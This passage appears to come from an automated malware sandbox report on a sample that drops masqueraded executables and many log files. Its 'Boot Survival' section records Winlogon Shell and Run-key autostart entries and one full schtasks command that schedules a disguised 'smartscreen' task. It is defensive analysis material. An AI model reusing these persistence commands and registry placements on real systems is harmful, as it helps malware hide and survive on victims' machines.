                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\DGaPaFaK.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\XTzlBYHG.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\aEgmRURW.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\mNqahFDV.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\uOkAGqBf.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\ceWKxdyo.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\LGyNPUZX.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\zujzDNjC.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\ROdEDIli.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\fkPTPiGE.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\cVzKNqfr.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\UBOVNjiG.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\akTuGdUy.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\mTUsIbsw.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\mVZsMoeb.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Recovery\WmiPrvSE.exeJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\ScMeneug.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\mESaxTkZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\sOCSoUjP.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\LXFfeqSZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\BVvzTrPR.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\LGyNPUZX.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\mVZsMoeb.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\TJxnsSJM.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\JVTxIHOe.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\sOCSoUjP.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\haYbFIoh.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\wBUQRRyD.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\mNqahFDV.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\ceWKxdyo.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\UBOVNjiG.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\XTzlBYHG.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\mESaxTkZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\cVzKNqfr.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\TmfudOZJ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\AaEpKsEu.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\rrkZaPzN.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\akTuGdUy.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\zujzDNjC.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\oGFJTCoU.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\WudDzgUF.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\LXFfeqSZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\CdKPGOIP.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\FlHYcgCL.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\vCoIsDxd.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\mTUsIbsw.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\SChMoWhg.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\aEgmRURW.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\PLrVhZhn.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\yEaqNnCZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\oVHaeKwr.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\XOqvKXRc.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\LVAfadhu.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\uOkAGqBf.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\jaFJWeGx.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\ROdEDIli.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\fkPTPiGE.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\GzqyMBLI.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\dzjCIUvL.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\DGaPaFaK.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\dQqVXqpO.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\ScMeneug.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\BVvzTrPR.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfSJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfSJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfSJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfSJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfSJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWrJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
